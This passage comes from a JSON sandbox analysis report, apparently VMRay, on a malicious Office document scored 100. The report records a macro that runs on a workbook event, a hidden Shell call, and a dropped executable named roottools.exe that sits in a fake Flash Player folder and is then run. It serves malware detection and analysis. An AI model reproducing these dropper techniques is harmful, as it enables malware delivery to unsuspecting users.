"vmray_download_data_http_request", "technique_desc": "URL \"www.google.com/\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_drop_pe_file", "operation_desc": "Drop PE file", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_drop_pe_file", "technique_desc": "Drop file \"c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\".", "technique_path": "built_in._pe._drop_pe_file.vmray_drop_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_execute_dropped_pe_file", "operation_desc": "Execute dropped PE file", "ref_gfncalls": [], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_dropped_pe_file", "technique_desc": "Execute dropped file \"c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\".", "technique_path": "built_in._pe._execute_dropped_pe_file.vmray_execute_dropped_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_vba", "category_desc": "VBA Macro", "operation": "_execute_macro_on_ws_event", "operation_desc": "Execute macro on specific worksheet event", "ref_gfncalls": [], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_macro_on_ws_event", "technique_desc": "Execute macro on \"Activate Workbook\" event.", "technique_path": "built_in._vba._execute_macro_on_ws_event.vmray_execute_macro_on_ws_event", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_vba", "category_desc": "VBA Macro", "operation": "_execute_application", "operation_desc": "Execute application", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_application", "technique_desc": " Shell OGADJTPBNNVIKR, vbHide", "technique_path": "built_in._vba._execute_application.vmray_execute_application", "type": "vti_rule_match", "version": 1 } ], "vti_rule_type": "Documents", "vti_score": 100 }, "yara": { "apply_yara": true, "apply_yara_on_created_files": true, "apply_yara_on_modified_files": true, "apply_yara_on_pcap_file": true, "apply_yara_on_process_dumps": true, "apply_yara_on_sample_files": true, "match_count": 0, "matches": [], "ruleset_count": 7, "type": "yara", "version": 1 } }